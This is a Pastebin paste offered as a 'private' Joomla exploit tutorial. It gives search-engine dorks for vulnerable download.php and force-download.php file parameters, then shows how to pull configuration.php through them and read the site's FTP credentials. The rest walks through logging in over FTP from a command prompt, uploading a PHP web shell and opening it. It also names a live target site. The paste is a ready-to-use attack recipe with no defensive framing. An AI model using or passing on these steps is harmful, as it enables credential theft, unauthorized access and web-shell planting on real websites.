Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ##################################################################################################
- # Exploit Title: Priv8 Exploit Upload Shell Via FTP CMD (Joomla)
- # Author: CoderSec
- # Contact: https://www.facebook.com/profile.php?id=100004954872423
- # Follow me on YOUTUBE : https://www.youtube.com/user/Dinz011
- # Date: 25/07/2014
- # Tested on : Windows
- ###################################################################################################
- Dork:
- inurl:/download.php?file=
- inurl:/force-download.php?file=
- Explorer ur brain
- Get Database :
- ww.site.com/download.php?file=configuration.php
- ww.site.com/force-download.php?file=configuration.php
- Find FTP User And FTP Password On Database :
- var $Ftp_User : 'user'
- var $Ftp_pass : 'user'
- var $Ftp_root : 'public_html'
- Upload Shell via FTP CMD
- 1. Open CMD
- Example :
- C:\Documents and Settings\USER> ftp site.com
- to www.site.com
- Connected to site.com
- username : user
- 331 Password Required for example
- Password : password
- user Loged in
- ftp> ls
- public_html ( view var $ftp_root ) --> If var $ftp_root : 'public_html' ( cd public_html )
- ftp>cd public_html
- ftp> put "C:\CoderSec.php" << shell
- Command Success
- File Transfered
- Shell Access :
- www.site.com/CoderSec.php
- Live Target :
- http://hisardoot.co.il/ISD/knife%20..%20configuration.php
- Ex : http://www8.0zz0.com/2014/07/25/09/326538625.jpg
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement